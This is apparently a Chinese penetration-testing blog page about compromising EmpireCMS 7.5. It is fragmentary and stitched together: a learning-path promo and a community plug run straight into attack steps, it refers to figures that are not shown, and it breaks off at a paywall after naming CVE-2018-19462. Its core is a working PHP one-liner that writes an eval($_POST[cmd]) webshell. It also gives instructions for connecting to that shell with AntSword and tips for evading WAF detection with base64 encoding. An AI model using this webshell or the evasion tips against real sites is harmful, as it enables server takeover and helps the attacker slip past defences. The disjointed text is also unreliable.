学习路线:
这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。不过,要想从脚本小子变成黑客大神,这个方向越往后,需要学习和掌握的东西就会越来越多以下是网络渗透需要学习的内容:
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
<?php file_put_contents("getshell.php","<?php @eval(\$_POST[cmd]); ?>");?>
导入成功后访问一下生成shell看能不能访问得到,没有报错是可以访问到的,那么证明已经上传成功了
再用蚁剑连接即可
几个实战中遇到的坑
1.有waf报错500
500很容易联想到禁止web流量,那么我们上传的一句话木马默认情况下是不进行加密的,所以很容易被waf识别并拦截。
解决方法:使用蚁剑自带的base64编码器和解密器即可成功上线,这里也可以用自己的编码器和解密器绕过waf拦截
2.不能使用冰蝎、哥斯拉马
因为要在$之前加\转义,冰蝎转义后的php.mod应该如下图所示
上传到模型处就无回显
实战小技巧
如果有waf拦截web流量就走加密传输,如果始终连接不上就要一步步的进行排查。这里可以在一句话密码后面输出一个echo 123,通过是否有回显来探测哪一步没有完善导致连接不成功
代码注入 (CVE-2018-19462)
漏洞原理
EmpireCMS7.5及之前版本中的admindbDoSql.php文件存在代码注入漏洞。
该漏洞源于外部输入数据构造代码段的过程中,网路系统或产品未正确过滤其中的特殊元素。攻击者可利用该漏洞生成非法的代码段,修改网络系统或组件的预期的执行控制流。
主要漏洞代码位置
执行sql语句处
分析源码定位漏洞出现的位置在localhost/EmpireCMS/e/admin/db/DoSql.php
最低0.47元/天 解锁文章
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
